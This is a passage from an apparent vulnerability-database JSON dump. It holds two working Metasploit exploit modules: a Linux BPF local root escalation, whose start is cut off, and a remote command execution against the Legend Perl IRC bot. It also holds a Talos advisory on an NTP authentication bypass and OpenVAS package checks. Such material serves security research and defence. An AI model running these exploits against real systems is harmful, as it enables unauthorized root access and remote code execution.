\"#{base_dir}/#{@doubleput_name}\"\n @suidhelper_path = \"#{base_dir}/suidhelper\"\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric(10..15)}\"\n\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n\n upload_and_compile(hello_path, hello, '-Wall -std=gnu99 `pkg-config fuse --cflags --libs`')\n upload_and_compile(doubleput_path, doubleput, '-Wall')\n upload_and_compile(@suidhelper_path, suid_helper, '-Wall')\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n\n upload_and_chmodx(hello_path, exploit_data('hello'))\n upload_and_chmodx(doubleput_path, exploit_data('doubleput'))\n upload_and_chmodx(@suidhelper_path, exploit_data('suidhelper'))\n end\n\n vprint_status 'Uploading payload...'\n upload_and_chmodx(payload_path, generate_payload_exe)\n\n print_status('Launching exploit. This may take up to 120 seconds.')\n\n register_dir_for_cleanup \"#{base_dir}/fuse_mount\"\n cmd_exec \"cd #{base_dir}; #{doubleput_path} & echo \"\n sec_waited = 0\n until sec_waited > datastore['MAXWAIT'] do\n Rex.sleep(5)\n # check file permissions\n if setuid? @suidhelper_path\n print_good(\"Success! set-uid root #{@suidhelper_path}\")\n cmd_exec \"echo '#{payload_path} & exit' | #{@suidhelper_path} \"\n return\n end\n sec_waited += 5\n end\n print_error \"Failed to set-uid root #{@suidhelper_path}\"\n end\n\n def cleanup\n cmd_exec \"killall #{@hello_name}\"\n cmd_exec \"killall #{@doubleput_name}\"\n ensure\n super\n end\n\n def on_new_session(session)\n # remove root owned SUID executable and kill running exploit processes\n if session.type.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n session.fs.file.rm @suidhelper_path\n session.sys.process.execute '/bin/sh', \"-c 'killall #{@doubleput_name}'\"\n session.sys.process.execute '/bin/sh', \"-c 'killall #{@hello_name}'\"\n session.fs.file.rm \"#{base_dir}/fuse_mount\"\n else\n session.shell_command_token \"rm -f '#{@suidhelper_path}'\"\n session.shell_command_token \"killall #{@doubleput_name}\"\n session.shell_command_token \"killall #{@hello_name}\"\n session.shell_command_token \"rm -f '#{base_dir}/fuse_mount'\"\n end\n ensure\n super\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/bpf_priv_esc.rb"}, {"lastseen": "2019-10-06T15:33:09", "bulletinFamily": "exploit", "description": "This module exploits a remote command execution on the Legend Perl IRC Bot. This bot has been used as a payload in the Shellshock spam last October 2014. This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and UDP flooding, the ability to remove system logs, and ability to gain root, and VNC scanning. Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.\n", "modified": "2018-08-20T20:43:07", "published": "2015-12-07T02:30:28", "id": "MSF:EXPLOIT/MULTI/MISC/LEGEND_BOT_EXEC", "href": "", "type": "metasploit", "title": "Legend Perl IRC Bot Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Legend Perl IRC Bot Remote Code Execution',\n 'Description' => %q{\n This module exploits a remote command execution on the Legend Perl IRC Bot.\n This bot has been used as a payload in the Shellshock spam last October 2014.\n This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and\n UDP flooding, the ability to remove system logs, and ability to gain root, and\n VNC scanning.\n\n Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script\n to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.\n },\n 'Author' =>\n [\n 'Jay Turla' # msf and initial discovery\n #MalwareMustDie\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '121681' ],\n [ 'EDB', '36836' ],\n [ 'URL', 'https://www.damballa.com/perlbotnado/' ],\n [ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details\n ],\n 'Platform' => %w{ unix win },\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd'\n }\n },\n 'Targets' =>\n [\n [ 'Legend IRC Bot', { } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 27 2015',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(6667),\n OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),\n OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),\n OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def check\n connect\n\n res = register(sock)\n if res =~ /463/ || res =~ /464/\n vprint_error(\"#{rhost}:#{rport} - Connection to the IRC Server not allowed\")\n return Exploit::CheckCode::Unknown\n end\n\n res = join(sock)\n if !res =~ /353/ && !res =~ /366/\n vprint_error(\"#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel\")\n return Exploit::CheckCode::Unknown\n end\n\n quit(sock)\n disconnect\n\n if res =~ /auth/ && res =~ /logged in/\n Exploit::CheckCode::Vulnerable\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def send_msg(sock, data)\n sock.put(data)\n data = \"\"\n begin\n read_data = sock.get_once(-1, 1)\n while !read_data.nil?\n data << read_data\n read_data = sock.get_once(-1, 1)\n end\n rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n end\n\n data\n end\n\n def register(sock)\n msg = \"\"\n\n if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?\n msg << \"PASS #{datastore['IRC_PASSWORD']}\\r\\n\"\n end\n\n if datastore['NICK'].length > 9\n nick = rand_text_alpha(9)\n print_error(\"The nick is longer than 9 characters, using #{nick}\")\n else\n nick = datastore['NICK']\n end\n\n msg << \"NICK #{nick}\\r\\n\"\n msg << \"USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\\r\\n\"\n\n send_msg(sock,msg)\n end\n\n def join(sock)\n join_msg = \"JOIN #{datastore['CHANNEL']}\\r\\n\"\n send_msg(sock, join_msg)\n end\n\n def legend_command(sock)\n encoded = payload.encoded\n command_msg = \"PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\\r\\n\"\n send_msg(sock, command_msg)\n end\n\n def quit(sock)\n quit_msg = \"QUIT :bye bye\\r\\n\"\n sock.put(quit_msg)\n end\n\n def exploit\n connect\n\n print_status(\"#{rhost}:#{rport} - Registering with the IRC Server...\")\n res = register(sock)\n if res =~ /463/ || res =~ /464/\n print_error(\"#{rhost}:#{rport} - Connection to the IRC Server not allowed\")\n return\n end\n\n print_status(\"#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...\")\n res = join(sock)\n if !res =~ /353/ && !res =~ /366/\n print_error(\"#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel\")\n return\n end\n\n print_status(\"#{rhost}:#{rport} - Exploiting the malicious IRC bot...\")\n legend_command(sock)\n\n quit(sock)\n disconnect\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/legend_bot_exec.rb"}], "talos": [{"lastseen": "2019-07-18T15:42:50", "bulletinFamily": "info", "description": "# Talos Vulnerability Report\n\n### TALOS-2015-0069\n\n## NAK to the Future: NTP Symmetric Association Authentication Bypass Vulnerability\n\n##### October 21, 2015\n\n##### CVE Number\n\nCVE-2015-7871\n\n##### Summary\n\nUnauthenticated off-path attackers can force ntpd processes to peer with malicious time sources of the attacker's choosing allowing the attacker to make arbitrary changes to system time. This attack leverages a logic error in ntpd's handling of certain crypto-NAK packets. When a vulnerable ntpd receives an NTP symmetric active crypto-NAK packet, it will peer with the sender bypassing the authentication typically required to establish a peer association.\n\n##### Tested Versions\n\nntp 4.2.8p3\n\n##### Product URLs\n\n<http://www.ntp.org>\n\n##### CVSS Score\n\nCVSSv2: 6.4 - (AV:N/AC:L/Au:N/C:N/I:P/A:P) \nCVSSv3: 7.2 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L\n\n##### Details\n\nIn most common configurations, ntpd determines which other NTP daemons to peer with via explicit configuration directives specified by an administrator in the ntp.conf configuration file. However, ntpd also has the ability to create ephemeral peer associations on the fly in response to certain kinds of incoming requests. In most common configurations, if ntpd receives such a packet, it will set up an ephemeral association with the sender only if the packet is correctly authenticated under a key that ntpd trusts.\n\nFor example, when ntpd receives a symmetric active (NTP mode 1) packet and there is no existing peer association with the sender, ntpd executes the following check to determine if the packet has been correctly authenticated before mobilizing a new ephemeral symmetric association.\n \n \n /* From: ntp_proto.c */\n \n \n if (!AUTH(sys_authenticate | (restrict_mask &\n (RES_NOPEER | RES_DONTTRUST)), is_authentic)) {\n \n \n /*\n * If authenticated but cannot mobilize an\n * association, send a symmetric passive\n * response without mobilizing an association.\n * This is for drat broken Windows clients. See\n * Microsoft KB 875424 for preferred workaround.\n */\n if (AUTH(restrict_mask & RES_DONTTRUST,\n is_authentic)) {\n fast_xmit(rbufp, MODE_PASSIVE, skeyid,\n restrict_mask);\n return; /* hooray */\n }\n if (is_authentic == AUTH_ERROR) {\n fast_xmit(rbufp, MODE_ACTIVE, 0,\n restrict_mask);\n sys_restricted++;\n return;\n }\n }\n \n\nIn contrast to the simpler checks present in other locations where ephemeral associations are mobilized, the logic for symmetric active packets has been complicated by a workaround to accommodate some non standards compliant clients. The intent of this code appears to be:\n\n * if (AUTH(restrict_mask &amp; RES_DONTTRUST, is_authentic)): If the packet is not authenticated and the sender is not restricted with \"notrust\", it's probably a non standards compliant client that mistakenly sends symmetric active mode packets instead of client mode (NTP mode 4) packets. In this case, it returns the symmetric passive response expected by such clients and ceases further processing (fast_xmit(); return;).\n * if (is_authentic == AUTH_ERROR): Otherwise, return a symmetric active mode crypto-NAK and cease further processing (fast_xmit(); return;).\n\nIn most cases, when ntpd receives a packet with a cryptographic digest that does not validate correctly, it bails out early and responds with a crypto-NAK --- an unauthenticated packet containing a keyid but no cryptographic digest which informs the sender that the received packet was not correctly authenticated.\n\nInternally, ntpd represents the authentication state of a received packet using the \"is_authentic\" variable which can take on four values under the following conditions:\n \n \n | is_authentic | packet has | packet has | packet validates |\n | | keyid | digest | under keyid |\n |--------------+------------+------------+------------------|\n | AUTH_NONE | N | N | N/A |\n | AUTH_OK | Y | Y | Y |\n | AUTH_ERROR | Y | Y | N |\n | AUTH_CRYPTO | Y | N | N/A |\n \n\nThus, when ntpd receives a crypto-NAK packet, it sets the \"is_authentic\" variable to the special value AUTH_CRYPTO. This has interesting implications for the authentication check described above. The AUTH() macro always returns false if the second input is AUTH_CRYPTO. This causes the first check for unauthenticated packets sent by non standards compliant clients to fail. The second check (is_authentic == AUTH_ERROR) only matches packets that contain a bad digest. As a result, crypto-NAK packets avoid both early termination conditions and proceed through to code which creates a new ephemeral association authenticated under the keyid specified by the packet, in this case keyid == 0. This has interesting implications when we consider how authentication is enforced.\n\nntpd can communicate simultaneously with both authenticated and unauthenticated peers. ntpd indicates the authentication requirements for an association by storing the id of the required authentication key in the \"keyid\" variable of the peer association structure. The special keyid value 0 indicates that no authentication is required. By default, when a packet is received from a peer with an active association, ntpd requires the packet to be authenticated only if the association requires authentication. This check is governed by the following code.\n \n \n /* From ntp_proto.c */\n \n \n /*\n * If the digest fails or it's missing for authenticated\n * associations, the client cannot authenticate a server\n * reply to a client packet previously sent. The loopback check\n * is designed to avoid a bait-and-switch attack, which was\n * possible in past versions. If symmetric modes, return a\n * crypto-NAK. The peer should restart the protocol.\n */\n } else if (!AUTH(peer->keyid || has_mac ||\n (restrict_mask & RES_DONTTRUST), is_authentic)) {\n report_event(PEVNT_AUTH, peer, \"digest\");\n peer->flash |= TEST5; /* bad auth */\n peer->badauth++;\n if (has_mac &&\n (hismode == MODE_ACTIVE || hismode == MODE_PASSIVE))\n fast_xmit(rbufp, MODE_ACTIVE, 0, restrict_mask);\n ...\n return;\n }\n \n\nLet us consider what happens to subsequent unauthenticated packets sent after an attacker sends a crypto-NAK. Because the association is configured with keyid 0, peer-&gt;keyid == 0. For unauthenticated packets has_mac == 0. As long as the sender is not subject to a \"notrust\" restriction, the first parameter of the AUTH() macro will be zero indicating that unauthenticated packets are permissible. Since is_authentic == AUTH_NONE for unauthenticated packets, AUTH() will return true, the guard will be false, and the packet will proceed to further processing. As long as the packet passes all the other consistency checks that can be met by any consistent NTP peer, it will be processed for time. If there are a majority of mutually-consistent attacking peers advertising the incorrect time, they can win the clock selection algorithm and cause the victim to accept their time.\n\n##### Attack Scenario\n\nLets look at an attack in action. We can monitor the attack progress by querying the victim for the status of its peer associations using the \"ntpq -c lpeer\" command. As the attack progresses, we'll see how the victim's peer status changes. Initially, the victim is configured with 5 upstream servers, server1-5:\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n +server1 192.168.99.1 2 u 2 64 77 61.985 -5.808 4.378\n +server2 192.168.99.2 2 u 66 64 37 87.387 -9.879 6.186\n *server3 .ACTS. 1 u 65 64 37 83.949 -9.816 6.583\n +server4 192.168.99.2 2 u 62 64 37 54.822 -7.868 4.310\n +server5 192.168.99.5 3 u 62 64 37 103.997 -5.807 4.369\n \n\nSix attacking nodes (attacker1-6) send symmetric active crypto-NAK packets to the victim causing the victim to establish ephemeral peer associations with the attacking nodes:\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n +server1 192.168.99.1 2 u 54 64 377 59.255 4.625 7.393\n +server2 192.168.99.2 2 u 51 64 377 83.354 0.156 7.140\n *server3 .ACTS. 1 u 48 64 373 86.698 2.518 10.006\n +server4 192.168.99.2 2 u 49 64 377 52.071 1.726 8.939\n +server5 192.168.99.5 2 u 47 64 377 101.751 3.860 8.142\n attacker1 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker2 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker3 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker4 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker5 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker6 .INIT. 16 S - 64 0 0.000 0.000 0.000\n \n\nIn this attack, the attackers consistently advertise time that is 5 minutes behind true time. Because the time provided by the attackers is consistent and they outnumber the legitimate servers, ntpd eventually declares the legitimate servers to be falsetickers and chooses an attacker node as the chosen peer.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n xserver1 192.168.99.1 2 u 32 64 377 57.873 1.455 5.495\n xserver2 192.168.99.2 2 u 27 64 377 84.543 -1.815 6.012\n xserver3 .ACTS. 1 u 25 64 367 92.528 -4.774 6.641\n xserver4 192.168.99.2 2 u 25 64 377 90.991 -22.040 18.962\n xserver5 192.168.99.5 2 u 25 64 377 98.811 0.776 6.355\n -attacker1 192.168.33.9 2 S 25 64 1 0.310 -300432 0.000\n +attacker2 192.168.33.9 2 S 1 64 1 1.210 -300432 0.000\n -attacker3 192.168.33.9 2 S 34 64 1 0.567 -300433 0.000\n -attacker4 192.168.33.9 2 S 10 64 1 15.753 -300417 0.000\n +attacker5 192.168.33.9 2 S 5 64 1 0.396 -300431 0.000\n *attacker6 192.168.33.9 2 S 22 64 1 0.258 -300432 0.000\n \n\nEventually the victim steps its clock to match the attacker-provided time and resets its associations.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n +server1 192.168.99.1 2 u 1 64 1 58.073 300425. 0.000\n +server2 192.168.99.2 2 u - 64 1 85.505 300424. 1.201\n *server3 .ACTS. 1 u 1 64 1 84.131 300423. 1.182\n server4 192.168.99.2 2 u 1 64 1 51.920 300425. 0.000\n -server5 192.168.99.5 2 u 2 64 1 98.141 300425. 0.737\n attacker1 .STEP. 16 S 276 64 0 0.000 0.000 0.000\n attacker2 .STEP. 16 S 159 64 0 0.000 0.000 0.000\n attacker3 .STEP. 16 S 407 64 0 0.000 0.000 0.000\n attacker4 .STEP. 16 S 176 64 0 0.000 0.000 0.000\n attacker5 .STEP. 16 S 95 64 0 0.000 0.000 0.000\n attacker6 .STEP. 16 S 75 64 0 0.000 0.000 0.000\n \n\nOnce the victim has stepped its clock, the attackers win the election to become the chosen peers. They can maintain the system's clock at the offset time or make further changes.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n xserver1 192.168.99.1 2 u 52 64 1 67.141 300424. 6.354\n xserver2 192.168.99.2 2 u 52 64 1 88.428 300424. 0.888\n xserver3 .ACTS. 1 u 53 64 1 107.698 300415. 12.255\n xserver4 192.168.99.2 2 u 51 64 1 67.562 300419. 5.143\n xserver5 192.168.99.5 2 u 56 64 1 101.432 300427. 1.491\n *attacker1 192.168.33.9 2 S 29 64 2 1.853 3.464 0.000\n -attacker2 192.168.33.9 2 S 10 64 3 0.102 5.735 3.579\n -attacker3 192.168.33.9 2 S 35 64 2 1.733 1.986 0.000\n -attacker4 192.168.33.9 2 S 10 64 3 0.205 5.640 2.975\n +attacker5 192.168.33.9 2 S 9 64 3 1.172 4.657 2.598\n +attacker6 192.168.33.9 2 S 24 64 2 2.516 4.041 0.000\n \n\nIn this example attack, we have only stepped the clock by 5 minutes. However, we have achieved larger offsets in lab testing. We are not aware of any limitations that would prevent attackers from stepping the clock by significantly greater values nor are we aware of limitations to prevent attackers from executing multiple successive steps to move the victim's system time arbitrarily from the initial time.\n\n##### Mitigation\n\nAttempts to exploit this vulnerability are detected by the following IDS rules:\n \n \n * Snort - SID 36536\n \n\nThe most complete mitigation is to upgrade to ntp-4.2.8p4. ntp-4.2.8p4 fixes a number of other critical issues in addition to this vulnerability. If your system's ntpd is packaged by the system vendor, apply your vendor's security update as soon as it becomes available. Until then, the best defense is to use firewall rules to block malicious traffic.\n\nIf your system supports a host-based firewall which blocks incoming traffic, such as the Windows Firewall, Mac OS X Application Firewall, or the Uncomplicated Firewall on Linux, you should enable it.\n\nFor other systems, appropriate firewall rules will depend on your environment. Use the following recommendations as a guideline for typical client-server and peer modes:\n\n * NTP clients should block incoming NTP packets from any system that is not a known, legitimate peer\n * NTP servers (and systems that must allow incoming ephemeral peer connections) should block incoming symmetric active (NTP mode 1) crypto-NAK packets\n\nIn environments where authentication has been configured between all NTP clients, servers, and peers, ntpd can be prevented from communicating with unauthenticated peers by enabling the ntpd \"notrust\" restriction. This does not prevent an attacker from causing the ephemeral peer association to be created. However, even with malicious peer associations active, ntpd should reject packets sent by those the malicious peers. The \"notrust\" restriction can be enabled by adding it to ntpd's default restriction lists:\n \n \n restrict -4 default kod notrap nomodify nopeer noquery notrust\n restrict -6 default kod notrap nomodify nopeer noquery notrust\n \n\nIf there are known-good peer connections that cannot be authenticated, the \"notrust\" restriction can be selectively relaxed for those peers only as follows:\n \n \n server ntp.mydomain.local\n restrict ntp.mydomain.local kod notrap nomodify nopeer noquery\n \n\n### Further Discussion\n\n##### Impact\n\nMalicious changes system time can have grave implications in a number of systems. With the ability to change system time, an attacker may be able to:\n\n * Authenticate via expired passwords and accounts\n * Cause TLS clients to accept expired and revoked certificates and to reject currently valid certificates\n * Circumvent modern web security mitigations such as certificate pinning and HTTP Strict Transport Security\n * Deny service to authentication systems such as Kerberos, Active Directory, and other systems that use time-limited authentication tickets such as web services\n * Force caching systems such as DNS and CDNs to flush their caches resulting in significant system performance degradation\n * Damage real-time and cyber-physical systems\n\n##### Am I Vulnerable?\n\nThis vulnerability has been confirmed in ntp version 4.2.8p3. The vulnerable code path was introduced in ntp version 4.2.5p186 (late 2009). Therefore, all ntp-4 stable releases from 4.2.5p186 through 4.2.8p3 appear to be vulnerable. All ntp-4 development versions from 4.3.0 through, at least, 4.3.76 also appear to be vulnerable.\n\nAny product which integrates an ntpd version from the vulnerable range may also be affected. Because many vendors patch ntpd before packaging it for distribution in their products, the susceptibility of any specific product must be considered on a per-product basis.\n\nThe Cisco Product Security Incident Response Team (PSIRT) is currently investigating the susceptibility of Cisco products to the vulnerabilities disclosed with ntp-4.2.8p4. A Cisco Security Advisory should be posted shortly:\n\n[http://tools.cisco.com/security/center/publicationListing.x](<https://tools.cisco.com/security/center/publicationListing.x>)\n\nPlease refer to the Cisco Security Vulnerability Policy for further information about vulnerability response:\n\n[http://www.cisco.com/web/about/security/psirt/security_vulnerability_policy.html](<https://www.cisco.com/web/about/security/psirt/security_vulnerability_policy.html>)\n\n##### Is Configuration X Vulnerable?\n\nIf an attacker can send symmetric active crypto-NAK packets to your ntpd process and can receive responses back, then you are vulnerable unless your ntpd is configured to reject unauthenticated packets from unknown peers (e.g. \"restrict default notrust ...\"). In a lab environment, we have successfully attacked:\n\n * Stratum 1 servers with attached refclocks\n * Clients configured with a single server\n * Clients in typical configurations with 4 servers from the NTP Pool Project and one fallback server\n\n##### How Do I Know If I'm Being Attacked?\n\nIn most common configurations, you can use ntpq to query the ntpd process running on your system for its list of peers. Any unexpected peers that are not configured in your /etc/ntp.conf file could indicate an attack:\n \n \n $ ntpq -c lpeer\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server 10.0.0.1 2 u 257 256 377 1.388 3.174 2.315\n 192.168.33.254 .INIT. 16 u - 1024 0 0.000 0.000 0.000\n \n\nYou can delete any rogue associations by restarting ntpd after applying the mitigations above.\n\nIf you have a compatible IDS product, the following Snort rules detect exploits of this vulnerability: 36536.\n\nMore generally, reception of unsolicited crypto-NAKs that are not in response to a packet originated by the recipient may indicate an attack.\n\n##### Where Can I Find More Information?\n\n * ntp.org Security Notices: <http://support.ntp.org/bin/view/Main/SecurityNotice>\n * Details of vulnerabilities fixed by ntp-4.2.8p4 that were found by other researchers \n * Cisco Talos: <http://talosintel.com/vulnerability-reports/>\n * Boston University: [http://www.cs.bu.edu/~goldbe/NTPattack.html](<https://www.cs.bu.edu/~goldbe/NTPattack.html>)\n * ntp.org Security Bug #2941: <https://bugs.ntp.org/show_bug.cgi?id=2941>\n * Cisco Security Advisories and Responses: [http://tools.cisco.com/security/center/publicationListing.x](<https://tools.cisco.com/security/center/publicationListing.x>)\n * Cisco Security Vulnerability Policy: [http://www.cisco.com/web/about/security/psirt/security_vulnerability_policy.html](<https://www.cisco.com/web/about/security/psirt/security_vulnerability_policy.html>)\n\n##### Timeline\n\n2015-10-07 - Vendor Disclosure \n2015-10-21 - Public Release\n\n##### Credit\n\nMatthew Van Gundy of Cisco ASIG\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2015-0130\n\nPrevious Report\n\nTALOS-2015-0065\n", "modified": "2015-10-21T00:00:00", "published": "2015-10-21T00:00:00", "id": "TALOS-2015-0069", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2015-0069", "title": "NAK to the Future: NTP Symmetric Association Authentication Bypass Vulnerability", "type": "talos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:05", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2009-1620", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122415", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122415", "title": "Oracle Linux Local Check: ELSA-2009-1620", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2009-1620.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122415\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:44:53 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2009-1620\");\n script_tag(name:\"insight\", value:\"ELSA-2009-1620 - bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2009-1620\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2009-1620.html\");\n script_cve_id(\"CVE-2009-4022\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~4.P1.el5_4.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~4.P1.el5_4.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~4.P1.el5_4.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~4.P1.el5_4.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~4.P1.el5_4.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~4.P1.el5_4.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~4.P1.el5_4.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~4.P1.el5_4.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:36:34", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2010-0062", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122397", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122397", "title": "Oracle Linux Local Check: ELSA-2010-0062", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0062.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122397\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:18:15 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0062\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0062 - bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available 